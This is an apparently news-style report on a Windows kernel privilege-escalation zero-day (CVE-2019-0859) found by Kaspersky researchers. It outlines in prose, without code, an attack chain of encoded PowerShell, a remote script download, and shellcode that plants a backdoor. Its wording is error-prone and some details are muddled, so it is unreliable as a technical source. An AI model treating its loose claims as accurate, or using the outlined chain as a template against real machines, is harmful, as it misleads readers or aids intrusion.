Kaspersky Lab has detected 0-day vulnerability in Microsoft Windows OS. Digging on this event, discovered a zero-day vulnerability found in win32.sys. Kaspersky Lab has discovered fifth exploited local privilege escalation vulnerability in Windows since October.
The vulnerability had reported on 17th March; I was patched with 60+ different vulnerabilities.
Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin, saw the bug in 64-bit version of Windows 7 to 10 OS. The attack was directly harmed to the kernel of the targeted system via a backdoor constructed from a core component of the Windows operating system.
Successful exploit, It can execute Powershell with a Base64 encoded command. The command download script from third party websites such as pastebin. The downloaded Powershell script executed another Shell script. The final script unpacks shellcode, allocates memory, allocates executable memory, and execute code. The primary goal to delivered a backdoor and takeover the targeted machine.
“This allows you to escalate privilege and get the same privileges the system has, It’s the highest level of privilege you can have.”Larin says
Zero-day exploits [are] not available for the general public, Only advanced actors use them.
After Microsoft investigated about the CVE-2019-0859. It was successful attack and run malicious code inside kernel mode and takeover the targeted machine. An attacker can manipulate data of the machine.
Cybercriminals are more active to run powershell malware for an attack.
it’s a popular target because it simplifies the concealment of illicit activity.